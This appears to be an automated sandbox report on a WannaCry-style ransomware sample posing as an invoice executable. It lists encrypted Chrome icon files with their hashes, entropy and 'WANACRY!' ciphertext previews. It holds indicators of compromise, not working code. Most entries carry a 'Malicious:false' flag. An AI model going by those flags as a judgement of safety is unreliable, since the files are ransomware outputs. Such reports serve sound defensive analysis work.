                                                          SHA-512:39D8AC1D41FA3434227BEDA123B817ADEC51DEB047A6135D2A4A1BE097690338E69284C0E8B3244454BA8EB28EE0D3B9BA00B7EDF4E67E953C3CC5C56D1BC020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........+k$,.K).<.}...C...(4..X...7...^./.].?..2M...h........H.._...5..\G.<..\...FD.Y..GZ.`......yu...b0...C0...I.......Of./Y..4.J.6..(.....i...e...yF{.x3`Z.E.B.f...v.B&E"TE.......]t....$.jJ|Tn..s..X....J5.....jm<;.8.*.4Q.{.Pt.o.K-7..I=...a...............?..o.%Vy.L..M<.'.Pe...0..Cn...R..,.`.^l...b..gI.>.@_xTP.WB.K'.3.g=(...N..k.:6W.=Aj..8..~U.2X..x;...b...a!V&p.pX.".....j..a..Mx/w.v(...k.J.6.~....z.f..4B.^|........+DF.\]w!.....0.i...0)..2........k3.I`...1.i.f...........Y..l'.KY[..:.....~...".i.7....S..D3.<.5.M...O!....V...1.....YgX_.&o. .M.U.V8......W.... Q".+.O.akr.._......!..%F......[7!....((.u";qF........@..?"V7J...xLwr.H..=..$.`.}L.....>.c={.......7.4G...2/.R..Z...:nO.r...Y.5.[B6...Fs.v..g.m...".fy.V...".......e.r......s.....|y^...W.RVK.....>%,.F+.^.9.i.......s....$...s..J.....Z...~..).8.c.A{...5.....a...E...@e.>.?.....!........GV.0%*.../........9....c.......... ...k..)...+54...Z.o.!..i...@18W...t.E.s./.Y.u.@.c8..s".8C.x6T1...MBBK.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3160
                                                          Entropy (8bit):7.9455628451804765
                                                          Encrypted:false
                                                          SSDEEP:48:bkWgUKBp4zJbsnFpcrM/SdtihgPvtEYCNmyOttDfpEa+jCjI1XJbWZcacBBS3EXv:oWUCzJbxfOgH2NmvXfMjCU1ZbWZcVEO
                                                          MD5:0A8B78AAB381C21AD2E8A49B1E1B4508
                                                          SHA1:C32D6E83C015C2EE35B86E65E93054EDE1F0EEF2
                                                          SHA-256:39BAD2E46D2B0BBF3BB8394C6957855C741C560EF1CE5E17FCB0A68C625664D9
                                                          SHA-512:AE35E936F81331222A11516AA580A1BC1233D75DD87E990A25BBFB74AFCD85D784461195006FC58B9CB44668FF5FBBE9E18DB259A46FF6BF21DBC57F4C3A148F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....oU...k._...W....S.F.K]..8...ka.?...<c...e.ydP:....1.....y..].=.I...A.....V."J..al...6.0&s.c..s......-...n....34M......m...\.T..t...v.W...+...w....6.%.n....B.........&xa....Z..,.A.]M"._.....(0pew..4.d...(.lX....q......+VA..&.....k..t?F....u...C....3........Y/4.....ke..z.rdlU..D=oZ`....v.0../...W9.6..(....I..6;].`.O.....g...V...6<..*k..$...2......"s.<....l.Y@..m....5...&..N...=R....>..@p:K;..k......EDE.c7cW.....H.6.....G|q.=....V./.=........|...c....m..Y..{.....C...q..,`...:_.W.y.y^....r.>q.^.F.t.s......3......I....*/..7."o.=`.o.L.t.5u.2.Tlc...hB.....O..[._Xh..8. ......M....."..u....qH.z...X.t..d.B....Pv..Nx...^o........t...ee+..f..p.z.....~t...Q......<U..;...K..W.7:.#G.d.t.P.3.......:2.5...i...]o.>5......{3j...........MZBM....U..rUL......m....(...T~....`GL. .&.wm.B.....1..3`].N......g..d.4.".Qq..B......V|U.3..'o(.1H....ET..D.....TlVw.....|~Fyn<l......fDTV.H'.!e..0J`...&..%)...E.>l.........m|.~Rx.....l...;.B|.GB`*.*.)..5.. ...k.R&

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3160
                                                          Entropy (8bit):7.9455628451804765
                                                          Encrypted:false
                                                          SSDEEP:48:bkWgUKBp4zJbsnFpcrM/SdtihgPvtEYCNmyOttDfpEa+jCjI1XJbWZcacBBS3EXv:oWUCzJbxfOgH2NmvXfMjCU1ZbWZcVEO
                                                          MD5:0A8B78AAB381C21AD2E8A49B1E1B4508
                                                          SHA1:C32D6E83C015C2EE35B86E65E93054EDE1F0EEF2
                                                          SHA-256:39BAD2E46D2B0BBF3BB8394C6957855C741C560EF1CE5E17FCB0A68C625664D9
                                                          SHA-512:AE35E936F81331222A11516AA580A1BC1233D75DD87E990A25BBFB74AFCD85D784461195006FC58B9CB44668FF5FBBE9E18DB259A46FF6BF21DBC57F4C3A148F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....oU...k._...W....S.F.K]..8...ka.?...<c...e.ydP:....1.....y..].=.I...A.....V."J..al...6.0&s.c..s......-...n....34M......m...\.T..t...v.W...+...w....6.%.n....B.........&xa....Z..,.A.]M"._.....(0pew..4.d...(.lX....q......+VA..&.....k..t?F....u...C....3........Y/4.....ke..z.rdlU..D=oZ`....v.0../...W9.6..(....I..6;].`.O.....g...V...6<..*k..$...2......"s.<....l.Y@..m....5...&..N...=R....>..@p:K;..k......EDE.c7cW.....H.6.....G|q.=....V./.=........|...c....m..Y..{.....C...q..,`...:_.W.y.y^....r.>q.^.F.t.s......3......I....*/..7."o.=`.o.L.t.5u.2.Tlc...hB.....O..[._Xh..8. ......M....."..u....qH.z...X.t..d.B....Pv..Nx...^o........t...ee+..f..p.z.....~t...Q......<U..;...K..W.7:.#G.d.t.P.3.......:2.5...i...]o.>5......{3j...........MZBM....U..rUL......m....(...T~....`GL. .&.wm.B.....1..3`].N......g..d.4.".Qq..B......V|U.3..'o(.1H....ET..D.....TlVw.....|~Fyn<l......fDTV.H'.!e..0J`...&..%)...E.>l.........m|.~Rx.....l...;.B|.GB`*.*.)..5.. ...k.R&

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4120
                                                          Entropy (8bit):7.956294551728417
                                                          Encrypted:false
                                                          SSDEEP:96:olD0dZgjhSxBDZV7GcQ6uGZRU0epHzVlRU1TU5/T8FWiWKcSQPJ:XiWDZVKZORbeVzVzUq5/RGcSQh
                                                          MD5:5714C857B25D08C7C0155C0BAA074902
                                                          SHA1:9BF57BE06B1A093E51CFC7374546B065A28DE1D4
                                                          SHA-256:ED944ABEFFEFC5319DCCFBA52E7C20A9B3B8EC08999C9B237ACE8FB4F4E9DC7E
                                                          SHA-512:93F3CDD0D1483A111F4ADB67D621F5EF7AE1217DB2FADA610B7969BE0D2F465762016DAC1A4E99770EBE7AD6FDBCB3552F226C02DFE1FA22D0079EED65007D60
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......%.1..vo;..v........;R$..Y.:R......!..._.eb..H...a.S:....Z4I..,g$.....A..P..|.\Q`.;..$k.}...!P..n.L&u.lP.a.3m...eHd..0.i..:b.>.......]....h...X3....(..#.b.k?.....E.i..h..>...Un.....mt.......<g...4...p.J3LE.|.n.z.....`z..8v3.....7..|...(.-H@..............OQ? F....O{VmTL...Q.B.........0......@.4.F._.....(.ur.a.80%6......wVa0........Z..k.g.7.DC..~..%....Jc....\.}f.....A....c..jY.|Qi.1.&s...}.....A7.i"...."p.%f.[.L|y"..o.$..v.....*7...y~>4....R.......p..6=.s.......sSg.<Z./e..0....)d....'...z.............*2.s...9..-..Q...3....nS...nW....t....:.+o..Vg.y.l.......Q.)....YNX]^/D..u..x..v.....!...[+.{4k.w.y.X..GM....D....ATDG......&.2.Y..|..!....j9.%.&.!...xx..|.........YE....N~.iW.>k..R@T...Y.#..$#U~.A..prB.......(....`..:%i..^H.H$.6}..f...6.........g..\.m..m.yt....W..b..o.w.......P....k..?.`7.e...r..[2......x..`.O...0...7. .........L.L/.c.....vE............3O..X..7/g..r.{...e...?...........8Ad)...S[s.o

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4120
                                                          Entropy (8bit):7.956294551728417
                                                          Encrypted:false
                                                          SSDEEP:96:olD0dZgjhSxBDZV7GcQ6uGZRU0epHzVlRU1TU5/T8FWiWKcSQPJ:XiWDZVKZORbeVzVzUq5/RGcSQh
                                                          MD5:5714C857B25D08C7C0155C0BAA074902
                                                          SHA1:9BF57BE06B1A093E51CFC7374546B065A28DE1D4
                                                          SHA-256:ED944ABEFFEFC5319DCCFBA52E7C20A9B3B8EC08999C9B237ACE8FB4F4E9DC7E
                                                          SHA-512:93F3CDD0D1483A111F4ADB67D621F5EF7AE1217DB2FADA610B7969BE0D2F465762016DAC1A4E99770EBE7AD6FDBCB3552F226C02DFE1FA22D0079EED65007D60
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......%.1..vo;..v........;R$..Y.:R......!..._.eb..H...a.S:....Z4I..,g$.....A..P..|.\Q`.;..$k.}...!P..n.L&u.lP.a.3m...eHd..0.i..:b.>.......]....h...X3....(..#.b.k?.....E.i..h..>...Un.....mt.......<g...4...p.J3LE.|.n.z.....`z..8v3.....7..|...(.-H@..............OQ? F....O{VmTL...Q.B.........0......@.4.F._.....(.ur.a.80%6......wVa0........Z..k.g.7.DC..~..%....Jc....\.}f.....A....c..jY.|Qi.1.&s...}.....A7.i"...."p.%f.[.L|y"..o.$..v.....*7...y~>4....R.......p..6=.s.......sSg.<Z./e..0....)d....'...z.............*2.s...9..-..Q...3....nS...nW....t....:.+o..Vg.y.l.......Q.)....YNX]^/D..u..x..v.....!...[+.{4k.w.y.X..GM....D....ATDG......&.2.Y..|..!....j9.%.&.!...xx..|.........YE....N~.iW.>k..R@T...Y.#..$#U~.A..prB.......(....`..:%i..^H.H$.6}..f...6.........g..\.m..m.yt....W..b..o.w.......P....k..?.`7.e...r..[2......x..`.O...0...7. .........L.L/.c.....vE............3O..X..7/g..r.{...e...?...........8Ad)...S[s.o

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6056
                                                          Entropy (8bit):7.969358562556899
                                                          Encrypted:false
                                                          SSDEEP:96:oBPEKMYZyQINzZOiwseUz+EDtQSglkyWI+oeRbLGiBJzi69XtgZUx6TXlCW:WsY81DSEqLkMRiLGiBJGI81x
                                                          MD5:59473DAF6A5F93FEA67AC6324146A7A7
                                                          SHA1:9D0F2BAC74426AB60FBBB1FF2DB46DE439F127C7
                                                          SHA-256:D7D63FB8BE9AA83A828CA01D32BF5367ECD4F98AB80B1D66C20678BC016BFFF2
                                                          SHA-512:2FAE325167AB1B97BE93888F6B29B2E3391A02025323EFABEF5ED5E88E2A24F3A246F8AAAE93AD54BA61A8EEDA20918A337DEE4B2A4A18E1D001FAC864001F1A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....6....lK..e.u..6.:.}.....aI.c.^.l.:.m#]...j..KhS.......VL.G..u.j............G..y.{..S....VF.....K......-.n{....``Vs..}\....kQ&.S.'G..,VD.`../..X..Q..H.....Xp..<.,.nfl*.YPeu...J..1..G......[.5$.8.%L.E.z..BS-<.`_.l..C..kt.Y......r.....u..../...............wI..0j..n.|....D...|?gecC..UW..Q....G......FL..$....Xe.g..9...;E.qg......V...i..v..N}..L[..?.U.9.O.\.d"...V.i...t.pDE7....(..pe.r...M70l.....,..H..f;.4.;...X`..#3_Xe...h....X......a.>~I=.9)=O.Z.7....T!E.'..k......)...@.+f.X._.....KH<k.(.\..4.".X....Q.x.....9.P_..t..QKU)..p....B.Ju..?U&.m.vV........*{Rv.U-.W.=.!rr(..0v...A....O..wb.}.n~..bh>$.c.b.'.J...../i........E.....<..a.yX.\.z...Vn7}>....D!...%.2v"....N..tDr..c...h:,.4.b.H..p....%:..n.U..{..f......I......=.G....~.B>.Wg.$...0..\....E...}...2._A)..l........6........V.c.x~F.b..2'E...do.vEG..Kj.g..Q.9....!..0......CoZ4..vo[.L.>-..lua7...Ks..Q_.L.....f.U.>..ktE.O.".q>.p.....di.DH..=...x}..H.#.Z.....Foxh..Zx.yB.p..CG..c@..._

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6056
                                                          Entropy (8bit):7.969358562556899
                                                          Encrypted:false
                                                          SSDEEP:96:oBPEKMYZyQINzZOiwseUz+EDtQSglkyWI+oeRbLGiBJzi69XtgZUx6TXlCW:WsY81DSEqLkMRiLGiBJGI81x
                                                          MD5:59473DAF6A5F93FEA67AC6324146A7A7
                                                          SHA1:9D0F2BAC74426AB60FBBB1FF2DB46DE439F127C7
                                                          SHA-256:D7D63FB8BE9AA83A828CA01D32BF5367ECD4F98AB80B1D66C20678BC016BFFF2
                                                          SHA-512:2FAE325167AB1B97BE93888F6B29B2E3391A02025323EFABEF5ED5E88E2A24F3A246F8AAAE93AD54BA61A8EEDA20918A337DEE4B2A4A18E1D001FAC864001F1A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....6....lK..e.u..6.:.}.....aI.c.^.l.:.m#]...j..KhS.......VL.G..u.j............G..y.{..S....VF.....K......-.n{....``Vs..}\....kQ&.S.'G..,VD.`../..X..Q..H.....Xp..<.,.nfl*.YPeu...J..1..G......[.5$.8.%L.E.z..BS-<.`_.l..C..kt.Y......r.....u..../...............wI..0j..n.|....D...|?gecC..UW..Q....G......FL..$....Xe.g..9...;E.qg......V...i..v..N}..L[..?.U.9.O.\.d"...V.i...t.pDE7....(..pe.r...M70l.....,..H..f;.4.;...X`..#3_Xe...h....X......a.>~I=.9)=O.Z.7....T!E.'..k......)...@.+f.X._.....KH<k.(.\..4.".X....Q.x.....9.P_..t..QKU)..p....B.Ju..?U&.m.vV........*{Rv.U-.W.=.!rr(..0v...A....O..wb.}.n~..bh>$.c.b.'.J...../i........E.....<..a.yX.\.z...Vn7}>....D!...%.2v"....N..tDr..c...h:,.4.b.H..p....%:..n.U..{..f......I......=.G....~.B>.Wg.$...0..\....E...}...2._A)..l........6........V.c.x~F.b..2'E...do.vEG..Kj.g..Q.9....!..0......CoZ4..vo[.L.>-..lua7...Ks..Q_.L.....f.U.>..ktE.O.".q>.p.....di.DH..=...x}..H.#.Z.....Foxh..Zx.yB.p..CG..c@..._

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10344
                                                          Entropy (8bit):7.980164762216397
                                                          Encrypted:false
                                                          SSDEEP:192:oLxEyeCD1PuX4qTi7nmpCITgXqNk755G6BQifowmWuoSi2Xqtw7eolbdFYUrsFaq:oSu1P84NnmpCAgXIkd/QifowmdoSXeXr
                                                          MD5:C7AE88951B41C81C9D900C5C200530F6
                                                          SHA1:003882570FA2E5F92BACB06FE8FF780492CB635F
                                                          SHA-256:743F64FF31ACCF87006A7E91B83352F7D26F52BBD9CD5406D031C6884501E56B
                                                          SHA-512:5C06D8BC7AF646D9C460E9956E9A07A7DC0ADBFD450AE43AA0D74C75624BBB444E4C30C52DB2F58056178BEC25293327B11C7B3B6EB392EC6128D0636CF2F8F3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+v....}..^...z..$..B..Fi.9:..cx1..0.\.......Q..?......*(.#......L...|H.]2E.........../y..}...w.m.]G.`Rb54.C..t...k.p.t....v.? ;...0_...&^.....aq.uCE;..}=E.k..;n.\...Uww...j.$...3....f...9.c7[.........8.7.^6%..}.F.kc...~..!...*........mV....h]....P'..........=<.G...[.......o.......M...Vw.h.2. ...q,...w.Z`.#....J.`.....[..'Cm..3..01N..fP......#...d?..]a....p...96..@..........z....p....$+Y....._.8>....,.vE.;\.....cLe.>..C)E.4..z.8..B....zg...+.h.....3~.{...I..@p..3...f.T_...Q.Zw7...Tg..Z....Jo....Q;%.O._.j..U.s..!...k............lo(u.7.&..j,3...+f.......!w..G>.S.jG...x.....)<...~B..t...uj.q.D>...c..<..3...<..\9........PsO...,.U....q.ee.X..z......,.]...^....ww3..N.Q.U..-.....x..h.....ab.m.k~j.{.....2H.....f..l;....:Lk<...Akr..P.].^...?......~..)".dU2.n89...AF'4.......A.>g......Uw.W9n.{.....gO.....!.. .u...;..u..;A...xx..W......#.e....M=.....,./.q......4..D...D.cU.6.h.N.. ..\/...c..X.. ..x7.C......R...JR...........

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10344
                                                          Entropy (8bit):7.980164762216397
                                                          Encrypted:false
                                                          SSDEEP:192:oLxEyeCD1PuX4qTi7nmpCITgXqNk755G6BQifowmWuoSi2Xqtw7eolbdFYUrsFaq:oSu1P84NnmpCAgXIkd/QifowmdoSXeXr
                                                          MD5:C7AE88951B41C81C9D900C5C200530F6
                                                          SHA1:003882570FA2E5F92BACB06FE8FF780492CB635F
                                                          SHA-256:743F64FF31ACCF87006A7E91B83352F7D26F52BBD9CD5406D031C6884501E56B
                                                          SHA-512:5C06D8BC7AF646D9C460E9956E9A07A7DC0ADBFD450AE43AA0D74C75624BBB444E4C30C52DB2F58056178BEC25293327B11C7B3B6EB392EC6128D0636CF2F8F3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+v....}..^...z..$..B..Fi.9:..cx1..0.\.......Q..?......*(.#......L...|H.]2E.........../y..}...w.m.]G.`Rb54.C..t...k.p.t....v.? ;...0_...&^.....aq.uCE;..}=E.k..;n.\...Uww...j.$...3....f...9.c7[.........8.7.^6%..}.F.kc...~..!...*........mV....h]....P'..........=<.G...[.......o.......M...Vw.h.2. ...q,...w.Z`.#....J.`.....[..'Cm..3..01N..fP......#...d?..]a....p...96..@..........z....p....$+Y....._.8>....,.vE.;\.....cLe.>..C)E.4..z.8..B....zg...+.h.....3~.{...I..@p..3...f.T_...Q.Zw7...Tg..Z....Jo....Q;%.O._.j..U.s..!...k............lo(u.7.&..j,3...+f.......!w..G>.S.jG...x.....)<...~B..t...uj.q.D>...c..<..3...<..\9........PsO...,.U....q.ee.X..z......,.]...^....ww3..N.Q.U..-.....x..h.....ab.m.k~j.{.....2H.....f..l;....:Lk<...Akr..P.].^...?......~..)".dU2.n89...AF'4.......A.>g......Uw.W9n.{.....gO.....!.. .u...;..u..;A...xx..W......#.e....M=.....,./.q......4..D...D.cU.6.h.N.. ..\/...c..X.. ..x7.C......R...JR...........

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7240
                                                          Entropy (8bit):7.976310964874543
                                                          Encrypted:false
                                                          SSDEEP:192:aM6biN+6lX77mAxMV9/ebKH/AX3dBMAf61+lsiFBUCb:aM6pUX3PxMHsHdmzwZ
                                                          MD5:432A7466710E8F3A15E16D3B24E8DD4C
                                                          SHA1:4FB0FAEB4B7E2484F9993BF0AA7F0D4D48901580
                                                          SHA-256:0BA29513181C96DABB2C610FF72B9D51BDCED97F09AAF821AE8B871AE38C551E
                                                          SHA-512:7778DC0D8354D0D6EBF528895C95C732DDBECB6793DC8694BE596C89F9A491570416E1E7BF85AC73962A6B66B7DCBBFF7BAEF6DBE794AF5937C36D97438FB0CD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....^?.#...!SI..fA...P..>..P.p+.....4..:G..L..X.4..l../.(.Udz..~..+..(&T| W+.X.qzT...u..5zQ..#......?.NX.....P....fy)\s&es_J%.W.K.k{.C....)y..`G...........UjVc....FMp.....l..A@..o. #..#-.z{........S...ft....,.......u..}z*.u.....}...C.0.#P..y.B.....D....+.......4.A.0.../.=#.5+Z...?.~.-....z..."Re..4...`..li.Y.E....g...../M.lho..l.V.....D.&....N..1.:.R.*.1.-#.Q...@9S...].w....b..'.@7Y....B..k>.OJ.k.d..0.......cG......0Q....*.~.*-B.......n..|.I.j@.......D>yP;....E.gB.~....&.*z.@.%.....R.V@s}.Z.se.{.Fkk..N...3....lu.[]s.jd....9...A|....I....0U....n..;...2....J.K.0...f..P.."V...9.7b*.I..&^.. .trg..j..k.c...W......!..K.<T.T..@<..8..(...).0.r.wi.b.b%.}...&.k&2QF...~...A*........X.(.(.....I..dh...5...Sq.T.t.j.m.....$...e._.5S.......b..h ...(&.t._[.. ...[1?Z.J7.....Pfk=1qJ..t&z..x.5.pCy...N.n.../.............&\9......9or.../AV.d9.aR.......<.V.v..=.Y.....)..).?....c..[....=...!..2.;..f....f.'..75,.XvQa.a...Dic".Fc...;Y...U..5p....r,..t<s.^.....9

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7240
                                                          Entropy (8bit):7.976310964874543
                                                          Encrypted:false
                                                          SSDEEP:192:aM6biN+6lX77mAxMV9/ebKH/AX3dBMAf61+lsiFBUCb:aM6pUX3PxMHsHdmzwZ
                                                          MD5:432A7466710E8F3A15E16D3B24E8DD4C
                                                          SHA1:4FB0FAEB4B7E2484F9993BF0AA7F0D4D48901580
                                                          SHA-256:0BA29513181C96DABB2C610FF72B9D51BDCED97F09AAF821AE8B871AE38C551E
                                                          SHA-512:7778DC0D8354D0D6EBF528895C95C732DDBECB6793DC8694BE596C89F9A491570416E1E7BF85AC73962A6B66B7DCBBFF7BAEF6DBE794AF5937C36D97438FB0CD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....^?.#...!SI..fA...P..>..P.p+.....4..:G..L..X.4..l../.(.Udz..~..+..(&T| W+.X.qzT...u..5zQ..#......?.NX.....P....fy)\s&es_J%.W.K.k{.C....)y..`G...........UjVc....FMp.....l..A@..o. #..#-.z{........S...ft....,.......u..}z*.u.....}...C.0.#P..y.B.....D....+.......4.A.0.../.=#.5+Z...?.~.-....z..."Re..4...`..li.Y.E....g...../M.lho..l.V.....D.&....N..1.:.R.*.1.-#.Q...@9S...].w....b..'.@7Y....B..k>.OJ.k.d..0.......cG......0Q....*.~.*-B.......n..|.I.j@.......D>yP;....E.gB.~....&.*z.@.%.....R.V@s}.Z.se.{.Fkk..N...3....lu.[]s.jd....9...A|....I....0U....n..;...2....J.K.0...f..P.."V...9.7b*.I..&^.. .trg..j..k.c...W......!..K.<T.T..@<..8..(...).0.r.wi.b.b%.}...&.k&2QF...~...A*........X.(.(.....I..dh...5...Sq.T.t.j.m.....$...e._.5S.......b..h ...(&.t._[.. ...[1?Z.J7.....Pfk=1qJ..t&z..x.5.pCy...N.n.../.............&\9......9or.../AV.d9.aR.......<.V.v..=.Y.....)..).?....c..[....=...!..2.;..f....f.'..75,.XvQa.a...Dic".Fc...;Y...U..5p....r,..t<s.^.....9

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25624
                                                          Entropy (8bit):7.9927968853242435
                                                          Encrypted:true
                                                          SSDEEP:768:LhHZLpp2FztT9W+XCNsKrFC+6C15fPxUR/:9Zn2FZT9hBCFC+pe
                                                          MD5:BC22BBA2F593C2E5B5BC0FB7DBD94C5E
                                                          SHA1:EB6FA1701B504385D4563A500D8D015CA9E8AEF2
                                                          SHA-256:22954DB255EE5E23D4759474E3791CCEDC00140E43F226400816BF6CE406D03E
                                                          SHA-512:9DDED79C76FEC4E339657CE0DA03517DE93CE4025B30A5B9B596756C82F5B19101F58915AB95C95828C694D2B47D9D48C8EBD3487682674979CE90BED1B03673
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Crm]"....".=|..n.[..]......U..#.hhX,h...C.i...%.R...Rnn.x.<.O..7..1.i.Z.`......H.....*.$p. )..SxJ..+...r...Q..........B.(s~.....p..9..(..X.O.?...!...Y...4.F...{(...."Ku...,.T.4..a]..M/~.W..,.4.....w#h..ehGm..'.....g...<<..pQ...t.v..{.......b............0.{..Y.#......%..$Ed.\.....R...RJQ....1...8J..[.9.....A.....5....}.B.?..<..&W..2...F....+........N....d>...4.17..qcc n...7..q.s.R.Z...=\.4.U.#..].<.+..."...v.[.x]4*.G....=..(..0Uq:.f.W....EP..sK.-{...P....P.`r..m.Xi.<O..UZl.......o.............cj.n..G+.]>I.{+..)...@x?..$?.....j.OXm..:?..j.`.}.8.x.N..<n.V.z..vB..cuZ..p.DP...D..........w'.....T.....]n.f...o....!6.9.m.....;... .).A....X....O..Z.K.....b^..I...}..!....qE.l...C.nO8ml...+..%..%.-..-_....gm..]............(.kV..b.}2...f...........?.:2....[.1......r..!..Sg.u...j..Vu..V..Sh.......|...z..v..3\..Y..l.D..O.l.....:K.....$.Q.q@.......=.O.n....>.......E.h..-.M",.7.K{N.......:ta......Y..'I..<>.bK.]...<..g.Z.......].ZCT.G.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25624
                                                          Entropy (8bit):7.9927968853242435
                                                          Encrypted:true
                                                          SSDEEP:768:LhHZLpp2FztT9W+XCNsKrFC+6C15fPxUR/:9Zn2FZT9hBCFC+pe
                                                          MD5:BC22BBA2F593C2E5B5BC0FB7DBD94C5E
                                                          SHA1:EB6FA1701B504385D4563A500D8D015CA9E8AEF2
                                                          SHA-256:22954DB255EE5E23D4759474E3791CCEDC00140E43F226400816BF6CE406D03E
                                                          SHA-512:9DDED79C76FEC4E339657CE0DA03517DE93CE4025B30A5B9B596756C82F5B19101F58915AB95C95828C694D2B47D9D48C8EBD3487682674979CE90BED1B03673
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Crm]"....".=|..n.[..]......U..#.hhX,h...C.i...%.R...Rnn.x.<.O..7..1.i.Z.`......H.....*.$p. )..SxJ..+...r...Q..........B.(s~.....p..9..(..X.O.?...!...Y...4.F...{(...."Ku...,.T.4..a]..M/~.W..,.4.....w#h..ehGm..'.....g...<<..pQ...t.v..{.......b............0.{..Y.#......%..$Ed.\.....R...RJQ....1...8J..[.9.....A.....5....}.B.?..<..&W..2...F....+........N....d>...4.17..qcc n...7..q.s.R.Z...=\.4.U.#..].<.+..."...v.[.x]4*.G....=..(..0Uq:.f.W....EP..sK.-{...P....P.`r..m.Xi.<O..UZl.......o.............cj.n..G+.]>I.{+..)...@x?..$?.....j.OXm..:?..j.`.}.8.x.N..<n.V.z..vB..cuZ..p.DP...D..........w'.....T.....]n.f...o....!6.9.m.....;... .).A....X....O..Z.K.....b^..I...}..!....qE.l...C.nO8ml...+..%..%.-..-_....gm..]............(.kV..b.}2...f...........?.:2....[.1......r..!..Sg.u...j..Vu..V..Sh.......|...z..v..3\..Y..l.D..O.l.....:K.....$.Q.q@.......=.O.n....>.......E.h..-.M",.7.K{N.......:ta......Y..'I..<>.bK.]...<..g.Z.......].ZCT.G.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1784
                                                          Entropy (8bit):7.889098158309454
                                                          Encrypted:false
